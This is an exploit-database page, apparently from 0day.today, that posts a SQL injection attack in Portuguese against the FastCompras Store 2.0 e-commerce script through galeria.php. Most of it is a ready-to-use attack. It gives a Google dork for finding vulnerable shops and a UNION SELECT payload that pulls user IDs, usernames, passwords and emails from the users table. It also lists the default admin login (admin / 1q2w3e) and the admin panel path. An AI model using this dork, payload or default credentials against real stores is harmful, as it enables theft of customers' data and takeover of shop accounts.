[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FastCompras Store (galeria.php) E-Commerce SQL Injection Vulnerability

Author
_mlk_
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14114
Category
web applications
Date add
20-09-2010
Platform
php
======================================================================
FastCompras Store (galeria.php) E-Commerce SQL Injection Vulnerability
======================================================================

# Exploit Title: FastCompras Store  (galeria.php nome) E-Commerce
# Author:  _mlk_
# Software: http://www.fastcompras.com.br/
# Version: 2.0
# Category:: WebApps
# Google dork: "Loja Virtual desenvolvida por FastCompras"
# Tested on: Windows & *nix




FastCompras Store  (galeria.php nome) E-Commerce

||======================================================================================================================||
||                                                                                                                      ||
||                                       [+] Encontrado por : _mlk_                                                     ||
||                                                                                                                      ||
||======================================================================================================================||
||                                                                                                                      ||
||      [-] Informaзхes                                                                                                 ||
||                                                                                                                      ||
||  [+] Script :  FastCompras Store                                                                                     ||
||                                                                                                                      ||
||  [+] Linguagem :  PHP                                                                                                ||
||                                                                                                                      ||
||  [+] Desenvolvedor :  http://www.fastcompras.com.br/                                                                 ||
||                                                                                                                      ||
||  [+] Dork :  "Loja Virtual desenvolvida por FastCompras"                                                             ||
||                                                                                                                      ||
||  [+] String :  "galeria.php?nome=SEЗГO&categoria=1"                                                                  ||
||                                                                                                                      ||
||  [+] Versгo : FastCompras Store Manager 2.0 (No Captcha)                                                             ||
||                                                                                                                      ||
||  [+] Data Encontrada :  23/05/10 (Brasil)                                                                            ||
||                                                                                                                      ||
||======================================================================================================================||
||                                                                                                                      ||
||  [&] Agradecimentos :                                                                                                ||
||                                                                                                                      ||
||       Deus , Familia e Amigos                                                                                        ||
||                                                                                                                      ||
||======================================================================================================================||
||                                                                                                                      ||
||     [*] Exemplo :                                                                                                    ||
||                                                                                                                      ||
||         http://localhost/galeria.php?nome=SEЗГO&categoria=1 [SQL-EVIL]                                               ||
||         http://localhost/[path]/galeria.php?nome=SEЗГO&categoria=1 [SQL-EVIL]                                        ||
||                                                                                                                      ||
||                                                                                                                      ||
||      ----------------------------------------------------------------------------------------------------------      ||
||                                                                                                                      ||
||                                                                                                                      ||
||     [*] Exploit :                                                                                                    ||
||                                                                                                                      ||
||         +union+select+concat(id_usuario,nome,nome_usuario,senha,perfil,email,data_cadastro,ativo)+from+usuarios--    ||
||                                                                                                                      ||
||                                                                                                                      ||
||      ----------------------------------------------------------------------------------------------------------      ||
||                                                                                                                      ||
||                                                                                                                      ||
||      [*] Demo :                                                                                                      ||
||                                                                                                                      ||
||          http://localhost/galeria.php?nome=SECOES&categoria=-1+union+select+colunas+from+usuarios--                  ||
||                                                                                                                      ||
||                                                                                                                      ||
||      ----------------------------------------------------------------------------------------------------------      ||
||                                                                                                                      ||
||                                                                                                                      ||
||      [*] Usuario Padrгo :                                                                                            ||
||                                                                                                                      ||
||          admin / 1q2w3e                                                                                              ||
||                                                                                                                      ||
||                                                                                                                      ||
||      ----------------------------------------------------------------------------------------------------------      ||
||                                                                                                                      ||
||                                                                                                                      ||
||      [*] Painel :                                                                                                    ||
||                                                                                                                      ||
||          http://localhost/manager/content/index.php                                                                  ||
||                                                                                                                      ||
||======================================================================================================================||



#  0day.today [2024-10-06]  #